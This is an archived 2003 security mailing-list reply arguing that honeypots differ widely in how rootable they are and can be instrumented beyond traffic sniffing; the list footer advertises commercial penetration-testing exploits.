On June 23, 2003 06:58 am, Rob Shein wrote: > This wouldn't work. Seeing the packets/traffic on the wire doesn't tell > you the tools that are used, and it also doesn't really give you much else. > Considering that a honeypot is either not really rootable (DTK) or is very > low hanging fruit (and very rootable, like a honeynet.org system), they > either won't see tools downloaded to the system or won't see anything more > than the bare minimum needed to exploit a system that is too vulnerable to > begin with. Putting on my Honeynet Project hat... I think you presume too much about honeypots. There are _many_ varieties of honeypots. Some more rootable than others, some more detectable than others. And it's also possible to instrument them with many other monitoring systems besides just sniffing traffic in and out. I'll leave the specifics as an excercise for the reader.... :-) but they range from running inside vmware to instrumented os loads and even special hardware in some cases. Lately the Honeynet Alliance folks have been deploying other systems besides your typical low hanging fruit. Different honeypots gather different data. It all depends on what you are trying to catch. Beware the Jabberwock... cheers, --dr -- pgpkey http://dragos.com/ kyxpgp --------------------------------------------------------------------------- Latest attack techniques. You're a pen tester, but is google.com still your R&D team? Now you can get trustworthy commercial-grade exploits and the latest techniques from a world-class research group. Visit us at: www.coresecurity.com/promos/sf_ept1 or call 617-399-6980 ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jun 24 2003 - 08:28:30 PDT